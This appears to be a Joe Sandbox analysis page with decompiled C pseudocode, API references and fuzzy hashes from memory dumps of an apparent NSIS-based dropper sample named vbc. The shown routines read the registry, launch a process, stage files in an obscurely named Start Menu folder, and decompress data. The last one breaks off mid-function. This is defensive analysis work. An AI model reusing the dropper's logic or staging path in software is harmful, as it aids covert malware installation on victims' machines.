Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: a529da5e5e50b73cda3617062f9fa6157020804c16351eeb2e898c586e7ec129
Instruction ID: 75e6d6340c5f39a85289ca98609147a27814c24a1fb1496c30dcde5ce6f9f3d4
Opcode Fuzzy Hash: a529da5e5e50b73cda3617062f9fa6157020804c16351eeb2e898c586e7ec129
Instruction Fuzzy Hash: 1A21C171908219AEEF04AFA4DE4AABE7BB4FF44304F14453EF505BA1D0D7B88541DB28

Uniqueness

Uniqueness Score: -1.00%

Function 004060DF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004060DF(void* _a4, int _a8, short* _a12, int _a16, void* _a20) {
				long _t20;
				long _t23;
				long _t24;
				char* _t26;

				asm("sbb eax, eax");
				_t26 = _a16;
				 *_t26 = 0;
				_t20 = RegOpenKeyExW(_a4, _a8, 0,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
				if(_t20 == 0) {
					_a8 = 0x800;
					_t23 = RegQueryValueExW(_a20, _a12, 0,  &_a16, _t26,  &_a8); // executed
					if(_t23 != 0 || _a16 != 1 && _a16 != 2) {
						 *_t26 = 0;
					}
					_t26[0x7fe] = 0;
					_t24 = RegCloseKey(_a20); // executed
					return _t24;
				}
				return _t20;
			}

0x004060ef
0x004060f1
0x004060fe
0x00406109
0x00406111
0x00406116
0x0040612a
0x00406132
0x00406140
0x00406140
0x00406146
0x0040614d
0x00000000
0x0040614d
0x00406156

APIs

RegOpenKeyExW.KERNEL32 ref: 00406109
RegQueryValueExW.KERNEL32(?,?,00000000,?,?,?), ref: 0040612A
RegCloseKey.KERNEL32(?), ref: 0040614D

Strings

Call, xrefs: 004060E2

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Call
API String ID: 3677997916-1824292864
Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
Instruction ID: 5a49725d9b8b462efd799bce316dcbaad7059079bb26d9a6c1e38be835131f9e
Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
Instruction Fuzzy Hash: 2F015A3110020AEACF218F26ED08EDB3BA9EF88391F01403AFD55D6220D774D964CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00401ED5 Relevance: 6.1, APIs: 4, Instructions: 52
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00401ED5() {
				void* _t16;
				long _t20;
				void* _t25;
				void* _t32;

				_t29 = E00402C53(_t25);
				E00405371(0xffffffeb, _t14);
				_t16 = E004058F2(_t29); // executed
				 *(_t32 + 8) = _t16;
				if(_t16 == _t25) {
					 *((intOrPtr*)(_t32 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t32 - 0x20)) != _t25) {
						_t20 = WaitForSingleObject(_t16, 0x64);
						while(_t20 == 0x102) {
							E00406628(0xf);
							_t20 = WaitForSingleObject( *(_t32 + 8), 0x64);
						}
						GetExitCodeProcess( *(_t32 + 8), _t32 - 0x38);
						if( *((intOrPtr*)(_t32 - 0x24)) < _t25) {
							if( *(_t32 - 0x38) != _t25) {
								 *((intOrPtr*)(_t32 - 4)) = 1;
							}
						} else {
							E00406159( *((intOrPtr*)(_t32 - 0xc)),  *(_t32 - 0x38));
						}
					}
					_push( *(_t32 + 8));
					CloseHandle();
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t32 - 4));
				return 0;
			}

0x00401edb
0x00401ee0
0x00401ee6
0x00401eed
0x00401ef0
0x004028a1
0x00401ef6
0x00401ef9
0x00401f04
0x00401f1b
0x00401f0f
0x00401f19
0x00401f19
0x00401f26
0x00401f2f
0x00401f41
0x00401f43
0x00401f43
0x00401f31
0x00401f37
0x00401f37
0x00401f2f
0x00401f4a
0x00401f4d
0x00401f4d
0x00402ade
0x00402aea

APIs

Part of subcall function 00405371: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
Part of subcall function 00405371: lstrcatW.KERNEL32 ref: 004053CC
Part of subcall function 00405371: SetWindowTextW.USER32 ref: 004053DE
Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C

Part of subcall function 004058F2: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 0040591B
Part of subcall function 004058F2: CloseHandle.KERNEL32(?), ref: 00405928

WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401F04
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401F19
GetExitCodeProcess.KERNEL32(?,?), ref: 00401F26
CloseHandle.KERNEL32(?), ref: 00401F4D

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: ce4c3a4a0d49c2fc719532998435d9b7fd41d27e7351c183d24eba856eac605c
Instruction ID: a49aa3197bbdededf4fd909b386d72e1103700f3deb01b848309097317d3e37e
Opcode Fuzzy Hash: ce4c3a4a0d49c2fc719532998435d9b7fd41d27e7351c183d24eba856eac605c
Instruction Fuzzy Hash: C411C431A00109EBCF10AFA0DD84ADD7BB6EF04344F20807BF502B61E1C7B94992DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402C53(0xfffffff0);
				_t17 = E00405C71(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405BF3(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E004058BD( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x20)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x20)) == _t28 || E004058DA(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405840( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x24)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406212(L"C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93\\Vatersotiges\\Knoglemarvsundersgelsen\\Armoniac",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

0x004015c1
0x004015c9
0x004015cc
0x004015d1
0x004015d5
0x004015d7
0x004015df
0x004015e1
0x004015e4
0x004015ea
0x00401604
0x00401607
0x004015ec
0x004015ec
0x004015ef
0x00000000
0x004015fa
0x004015fd
0x004015fd
0x004015ef
0x0040160e
0x00401615
0x00401624
0x00401624
0x00401617
0x0040161a
0x00401622
0x00000000
0x00000000
0x00401622
0x00401615
0x00401627
0x0040162b
0x0040162c
0x004015d7
0x00401634
0x00401663
0x0040224b
0x00401636
0x00401638
0x00401645
0x0040164d
0x00401655
0x0040165b
0x0040165b
0x00401655
0x00402ade
0x00402aea

APIs

Part of subcall function 00405C71: CharNextW.USER32(?), ref: 00405C7F
Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C84
Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C9C

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405840: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405883

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac, xrefs: 00401640

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac
API String ID: 1892508949-910239263
Opcode ID: 46258d5e47a55c227e30756453a4487545b3b1288a22cb13dd57ab731c0ecd30
Instruction ID: 477ca9af34b4fba6f67c9146569026d5a406fcfc9585fcc70d51ae903c55bf24
Opcode Fuzzy Hash: 46258d5e47a55c227e30756453a4487545b3b1288a22cb13dd57ab731c0ecd30
Instruction Fuzzy Hash: C511D331504505EBCF30BFA4CD0199E36A0FF15358B25893BE902B22F1DB3E4A919B5E

Uniqueness

Uniqueness Score: -1.00%

Function 004052E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004052E5(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t9;
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x423714 != _t16) {
							_push(_t16);
							_push(6);
							 *0x423714 = _t16;
							E00404CBB();
						}
						L11:
						_t9 = CallWindowProcW( *0x42371c, _a4, _t15, _a12, _t16); // executed
						return _t9;
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404C3B(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404322(0x413);
				return 0;
			}

0x004052e9
0x004052f3
0x0040530f
0x00405331
0x00405334
0x0040533a
0x00405344
0x00405345
0x00405347
0x0040534d
0x0040534d
0x00405357
0x00405365
0x00000000
0x00405365
0x0040531c
0x00405354
0x00405354
0x00000000
0x00405354
0x00405328
0x0040532a
0x00000000
0x0040532a
0x004052f9
0x00000000
0x00000000
0x00405300
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00405314
CallWindowProcW.USER32(?,?,?,?), ref: 00405365

Part of subcall function 00404322: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404334

Strings

, xrefs: 004052F5

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 1c38682ff548693de77d02b4aeee144e7a7efb8abd51762e205331c359b10038
Instruction ID: 55ce392e6746b2cc60fd0279fd4fa9b35be9dafe7b92107a95c9794c7a372d77
Opcode Fuzzy Hash: 1c38682ff548693de77d02b4aeee144e7a7efb8abd51762e205331c359b10038
Instruction Fuzzy Hash: 8F01B1B2200708ABEF209F11DD80AAB3725EB80395F545036FE007A1D1C3BA8D929E6D

Uniqueness

Uniqueness Score: -1.00%

Function 004058F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004058F2(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x426730->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426730,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x004058fb
0x0040591b
0x00405923
0x00405928
0x00000000
0x0040592e
0x00405932

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 0040591B
CloseHandle.KERNEL32(?), ref: 00405928

Strings

Error launching installer, xrefs: 00405905

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
Instruction ID: ac9b0bf38c37d054f1ed4f6a01e64bdbc49d0edc431f290d839f62d49592851a
Opcode Fuzzy Hash: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
Instruction Fuzzy Hash: B0E04FF0A00209BFEB009B64ED45F7B77ACEB04208F404431BD00F2160D77498148A78

Uniqueness

Uniqueness Score: -1.00%

Function 00406D0F Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00406D0F() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M0040717D))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
